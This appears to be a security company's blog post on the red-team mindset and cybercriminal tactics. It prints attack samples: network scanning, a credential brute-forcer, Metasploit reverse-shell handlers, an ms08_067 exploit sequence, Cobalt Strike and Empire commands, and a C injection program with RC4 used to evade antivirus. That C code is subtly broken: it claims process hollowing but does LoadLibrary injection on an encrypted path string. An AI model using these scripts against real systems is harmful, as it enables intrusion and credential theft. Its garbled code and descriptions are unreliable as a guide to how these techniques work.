The Mindset of Red Teamers

One of the most crucial aspects of defense is understanding the adversary. Cybercriminals operate with a distinct mindset, employing a wide array of tactics, techniques, and procedures (TTPs) to achieve their malicious objectives. Curiosity is the driving force behind a red teamer's relentless pursuit of knowledge and understanding. They possess an insatiable desire to explore, question, and experiment with new ideas and technologies. This innate curiosity fuels their creativity, enabling them to devise innovative solutions to complex cybersecurity problems. Red teamers approach every challenge as an opportunity to push the boundaries of conventional thinking, constantly seeking new ways to uncover vulnerabilities and bypass security measures. Whether it's devising novel attack vectors, crafting sophisticated social engineering schemes, or exploring emerging technologies, red teamers thrive on the thrill of exploration and discovery. In this blog post, we'll delve into the mindset of read teamers and explore their TTPs to better equip ourselves in the ongoing battle against cyber threats.

While red teaming exercises are conducted to assess and improve the security posture of organizations. It is essential to ensure that such activities are performed within legal and ethical boundaries, with appropriate authorization and consent from the organization being tested.

Understanding the Red Team Mindset

Adversarial Thinking: Red teamers adopt an adversarial mindset, thinking like attackers to identify vulnerabilities and exploit them. They anticipate the tactics, techniques, and procedures (TTPs) adversaries might employ and use this insight to craft realistic attack scenarios.

Creativity and Ingenuity: Successful attacks often require creativity and ingenuity. Red teamers leverage their creativity to devise novel attack vectors and circumvent security controls. They think outside the box, exploring unconventional methods to achieve their objectives.

Patience and Persistence: Attackers exhibit patience and persistence in their pursuit of targets. Similarly, red teamers adopt a patient approach, meticulously planning and executing their attacks over time. They persistently probe for weaknesses, adapting their tactics as necessary to overcome obstacles.

Social Engineering Skills: Social engineering plays a significant role in many attacks, exploiting human psychology to manipulate individuals into divulging sensitive information or performing actions that aid the attacker. Red teamers hone their social engineering skills to effectively influence and manipulate targets.

Tactics, Techniques, and Procedures (TTPs) of Cybercriminals

Cybercriminals employ a diverse range of tactics, techniques, and procedures (TTPs) to achieve their objectives. Some common TTPs include:

• Phishing: Using deceptive emails, text messages, and social engineering tactics to trick users into revealing sensitive information or downloading malicious software.
• Malware: Short for malicious software, malware refers to software intentionally designed to cause damage to a computer, server, client, or computer network. One common form of malware is disguised as normal-looking applications, such as games, utility tools, or even security software. These applications may appear harmless or useful to users but contain hidden malicious code. Once installed, they can steal sensitive information, disrupt system operations, or give unauthorized access to the attacker usually through a c2. This deceptive tactic is often used to trick users into unwittingly installing the malware.
• Exploitation of Vulnerabilities: Exploiting software vulnerabilities and misconfigurations to gain unauthorized access to systems, escalate privileges, and execute malicious commands.
• Credential Theft: Harvesting usernames, passwords, and other authentication credentials through various means, such as phishing, brute-force attacks, and credential dumping, to gain unauthorized access to accounts and systems.
• Remote Access Tools (RATs): Remote access tools, such as backdoors and remote administration tools, maintain persistent access to compromised systems and exfiltrate data.
• Distributed Denial of Service (DDoS): DDoS attacks overwhelm and disrupt the availability of online services, websites, and networks, often for extortion or ideological reasons.

The Red Teamer must keep up to date on these tactics and utilize their inherent creativity in crafting simulations of these procedures. Each of these tactics is seldom executed independently of the other rather each relies on the next to gain initial or further access. An attack could begin with a spear phishing campaign that utilizes malware for credential harvesting. Once credentials have been harvested a RAT could be deployed through an exploit found with initial access.

Real-World Examples: Scripts

Red Teamers utilize scripts to keep the attack server history clear, and to keep track of each method used. There are an ever-growing number of tools used during engagements, but there are a few which are fairly universal. Below are examples of these methods and tools written in Python and C.

‍

Enumeration and Information Gathering in Python

Below is a script that uses NMAP, an open-source tool for network exploration and security auditing. This tool is universally used to discover open ports and potentially vulnerable services:

# Example script for network enumeration using Nmap
import nmap

nm = nmap.PortScanner()
nm.scan('192.168.1.0/24', arguments='-p 22,80,443 -sV')
print(nm.all_hosts())

‍

Exploitation and Post-Exploitation in Python

In the example below a web request to a url login is sent as a POST request. This script can be used for testing credentials harvested, brute forcing (a tactic using a list of words to guess the password), and modified for sql injection:

# Example script for exploiting a vulnerable web server
import requests

url = 'http://vulnerable-server.com/login'
payload = {'username': 'admin', 'password': 'password'}
response = requests.post(url, data=payload)
print(response.text)

‍

Persistence and Lateral Movement in Python

This script below creates a meterpreter handler to establish a listener that will listen for a connection from a backdoor or payload. The session created can also be used to connect to adjacent networks laterally moving between VLANS or network segments:

# Example script for creating a backdoor using Metasploit
from metasploit.msfrpc import MsfRpcClient

client = MsfRpcClient('password')
exploit = client.modules.use('exploit', 'multi/handler')
exploit.execute(payload='windows/meterpreter/reverse_tcp')

‍

Encrypted Malware Example in C

In the example malware creates a new process in a suspended state, replaces its code and memory space with a malicious payload such as a prompt or C2 shellcode, and then resumes the execution of the process. This makes it appear as if the legitimate process is running normally while executing malicious code. RC4 encryption is used to obfuscate the code from static analysis such as an EDR/AV:

#include <windows.h>
#include <stdio.h>
#include <iostream>
#include <string>

// RC4 key scheduling algorithm
void ksa(unsigned char S[256], const unsigned char* key, size_t key_length) {
    for (int i = 0; i < 256; ++i) {
        S[i] = i;
    }

    int j = 0;
    for (int i = 0; i < 256; ++i) {
        j = (j + S[i] + key[i % key_length]) % 256;
        std::swap(S[i], S[j]);
    }
}

// RC4 pseudo-random generation algorithm
void prga(const unsigned char S[256], unsigned char* data, size_t data_length) {
    int i = 0;
    int j = 0;
    for (size_t k = 0; k < data_length; ++k) {
        i = (i + 1) % 256;
        j = (j + S[i]) % 256;
        std::swap(S[i], S[j]);
        int t = (S[i] + S[j]) % 256;
        data[k] ^= S[t];
    }
}

// Function to encrypt data using RC4
std::string rc4_encrypt(const std::string& plaintext, const std::string& key) {
    unsigned char S[256];
    ksa(S, reinterpret_cast<const unsigned char*>(key.c_str()), key.length());

    std::string ciphertext = plaintext;
    prga(S, reinterpret_cast<unsigned char*>(&ciphertext[0]), ciphertext.length());

    return ciphertext;
}

int main() {
    // Path to the legitimate process to be hollowed
    LPCSTR targetProcessPath = "C:\\Windows\\System32\\notepad.exe";

    // Malicious payload to be injected (encrypted using RC4)
    std::string encryptedPayload = rc4_encrypt("malicious_payload.dll", "SecretKey");

    // Create a suspended instance of the target process
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    CreateProcess(targetProcessPath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

    // Get the base address of the target process
    LPVOID targetProcessBaseAddress = VirtualAllocEx(pi.hProcess, NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // Write the encrypted payload into the target process
    WriteProcessMemory(pi.hProcess, targetProcessBaseAddress, encryptedPayload.c_str(), encryptedPayload.length() + 1, NULL);

    // Get the address of the LoadLibrary function from kernel32.dll
    LPTHREAD_START_ROUTINE loadLibraryAddr = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");

    // Create a remote thread in the target process to execute the malicious payload
    HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, 0, loadLibraryAddr, targetProcessBaseAddress, 0, NULL);

    // Wait for the remote thread to finish execution
    WaitForSingleObject(hThread, INFINITE);

    // Resume the execution of the target process
    ResumeThread(pi.hThread);

    // Close handles
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

    return 0;
}

‍

Phishing Campaign

Phishing is a deceptive technique used by hackers to trick individuals into divulging sensitive information, such as login credentials, personal details, or financial data. Red team hackers often employ sophisticated phishing campaigns to infiltrate organizations and gain unauthorized access to their systems.

Crafting Convincing Emails

A red team hacker begins by meticulously crafting phishing emails designed to mimic legitimate communication. They research the organization's branding, communication style, and typical email formats to make the emails appear authentic. These emails often impersonate trusted entities, such as colleagues, IT support staff or well-known companies.

Exploiting Psychological Triggers

Phishing emails exploit psychological triggers to manipulate recipients into taking action. Red team hackers leverage urgency, curiosity, fear, or greed to compel recipients to click on malicious links, download attachments, or provide sensitive information. For example, an email might claim that urgent action is required to prevent an account suspension or offer a tempting reward for participating in a survey.

Creating Convincing Landing Pages

Once recipients click on a phishing link, they are directed to a spoofed website or landing page designed to mimic a legitimate login portal, survey form, or download page. These fake pages closely resemble their authentic counterparts, making it difficult for users to discern the difference. Red team hackers often use tools like Social-Engineer Toolkit (SET) or custom-built web pages to create these deceptive landing pages.

Harvesting Credentials

As unsuspecting users input their login credentials or other sensitive information into the fake forms, red team hackers capture this data for malicious purposes. They may store the stolen credentials in plaintext or encrypted form for later use in further attacks, such as unauthorized access to corporate accounts or launching internal phishing campaigns.

Evading Detection

To evade detection by security systems and email filters, red team hackers constantly evolve their phishing tactics. They may employ techniques like domain spoofing, obfuscation of malicious URLs, and leveraging compromised email accounts to bypass traditional security measures. Additionally, they monitor and adapt to changes in the organization's security posture to maintain their effectiveness.

Mitigation Strategies

Organizations can mitigate the risk of phishing attacks by implementing robust security awareness training programs, deploying email filtering solutions, and adopting multi-factor authentication (MFA) to protect against stolen credentials. Regular phishing simulations conducted by red teams can also help employees recognize and report suspicious emails, bolstering the organization's overall resilience to phishing attacks.

Distributed Denial of Service (DDoS)

Distributed Denial of Service (DDoS) attacks represent a significant threat to the stability and security of online services, businesses, and even governments. By inundating targeted systems with a flood of traffic, DDoS attacks render them inaccessible to legitimate users, disrupting operations and potentially causing financial losses. A DDoS attack is a tactic usually used to disrupt services to reveal weakness in defense team responses and can be used to mask malicious activities.

Tools, scripts, and techniques used in DDoS attacks are varied and constantly evolving as attackers seek new methods to overwhelm and disrupt target systems. Here are some commonly used tools, scripts, and techniques:

1. Botnets: Botnets are networks of compromised computers or devices controlled by a central command-and-control (C&C) server. Attackers use botnets to coordinate and launch DDoS attacks, leveraging the combined computing power of the compromised devices to generate a massive volume of traffic.
2. Stress Testing Tools: Originally developed for legitimate network stress testing purposes, tools such as LOIC (Low Orbit Ion Cannon), HOIC (High Orbit Ion Cannon), and XerXes have been repurposed by attackers to launch DDoS attacks. These tools allow attackers to easily flood target systems with traffic, often with minimal technical expertise required.
3. Amplification Attacks: Amplification attacks exploit vulnerabilities in certain network protocols to amplify the volume of traffic directed towards the target system. Commonly abused protocols include DNS (Domain Name System), NTP (Network Time Protocol), SSDP (Simple Service Discovery Protocol), and SNMP (Simple Network Management Protocol). By spoofing the source IP address of their requests, attackers can amplify the amount of traffic directed at the target.
4. Reflection Attacks: Reflection attacks involve sending spoofed requests to a large number of servers, with the responses directed toward the target system. This technique leverages the bandwidth and resources of intermediary servers to amplify the impact of the attack on the target.
5. Application Layer Attacks: Application layer attacks target specific applications or services running on the target system, aiming to exhaust server resources or exploit vulnerabilities. Examples include HTTP floods, which inundate web servers with HTTP requests, and Slowloris attacks, which exploit the limited number of concurrent connections allowed by web servers.
6. DDoS-for-Hire Services (Booter/Stresser Services): These are online services that offer DDoS attack capabilities for a fee. Users can rent access to botnets or stress testing tools, allowing them to launch DDoS attacks against specified targets with minimal effort.
7. IoT (Internet of Things) Botnets: With the proliferation of internet-connected devices, attackers have increasingly targeted vulnerable IoT devices to recruit them into botnets for launching DDoS attacks. Insecure IoT devices with default or weak credentials are particularly susceptible to exploitation.
8. Traffic Manipulation Techniques: Attackers may employ various traffic manipulation techniques, such as IP spoofing, to disguise the source of the attack traffic and evade detection or mitigation measures.

Mitigation against DDoS attacks often involves a combination of network-level defenses, such as traffic filtering and rate limiting, and application-layer protections, such as web application firewalls (WAFs); additionally, proactive monitoring, threat intelligence sharing, and incident response planning are essential for effectively mitigating the impact of DDoS attacks and maintaining operational resilience.

Credential Harvesting Using Brute Force Scripts

Here is a sample script in Python that sends HTTP POST requests to the target URL, attempting different combinations of usernames and passwords. If the response from the server indicates a successful login (such as the absence of a "Login failed" message), the script prints the valid credentials.

import requests

def harvest_credentials(url, username_field, password_field, user_list, password_list):
    for username in user_list:
        for password in password_list:
            payload = {username_field: username, password_field: password}
            response = requests.post(url, data=payload)
            if "Login failed" not in response.text:
                print("Valid credentials found: {}:{}".format(username, password))
                # Optionally, you can save the valid credentials to a file or database
                break

# Example usage:
if __name__ == "__main__":
    target_url = "https://example.com/login"
    username_field_name = "username"
    password_field_name = "password"
    usernames = ["admin", "user", "test"]
    passwords = ["password", "123456", "admin123"]

    harvest_credentials(target_url, username_field_name, password_field_name, usernames, passwords)

Remote Access Tools(RATS)

RATs are essential for red teamers as they provide remote control over compromised systems, enabling lateral movement, data exfiltration, and further exploitation. Here are some commonly used RATs:

Metasploit

‍Metasploit is a powerful framework that offers a range of exploits, payloads, and auxiliary modules for penetration testing and red teaming. Below is a sample script using Metasploit to exploit a vulnerability and gain remote access

use exploit/windows/smb/ms08_067_netapi
set RHOSTS target_ip
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

‍

Cobalt Strike

Cobalt Strike is a commercial penetration testing tool that includes features for post-exploitation, command and control, and collaboration. The following script demonstrates how to use Cobalt Strike to establish a foothold on a target system

./teamserver IP_ADDRESS my_password

‍

Empire

Empire is a post-exploitation framework that provides a variety of modules for command execution, privilege escalation, and lateral movement. Here's an example of using Empire to execute commands on a compromised host

usemodule execution
set listener http
execute -f calc.exe

‍

Meaningful resources for further research:

"The Unorthodox Approach to Red Teaming" by Will Burgess: Published in the Red Team Journal, this article explores unconventional tactics and strategies employed by red teams, emphasizing the need for adaptability and innovation. (The journal is now defunct)

"The Art of Red Teaming" by Jayson E. Street: In this article published in Infosec Island, Jayson Street discusses the mindset and methodologies of red teamers, drawing from his extensive experience in offensive security operations.

"The Red Team Field Manual" by Ben Clark: A reference guide developed from operator field notes inspired by years of Red Team missions.

Conclusion

The mindset of a red teamer is characterized by curiosity, creativity, persistence, ethical integrity, analytical acumen, and collaborative spirit. These individuals play a vital role in safeguarding organizations against cyber threats by emulating the tactics of malicious actors and uncovering vulnerabilities before they can be exploited. Through real-world scenarios, we have witnessed the transformative impact of SYNOPS services in identifying and mitigating cybersecurity risks. As the cybersecurity landscape continues to evolve, the role of red teamers will remain indispensable in defending against emerging threats and ensuring the resilience of critical infrastructure. Stay tuned for our next article where we look at real-world red team scenarios.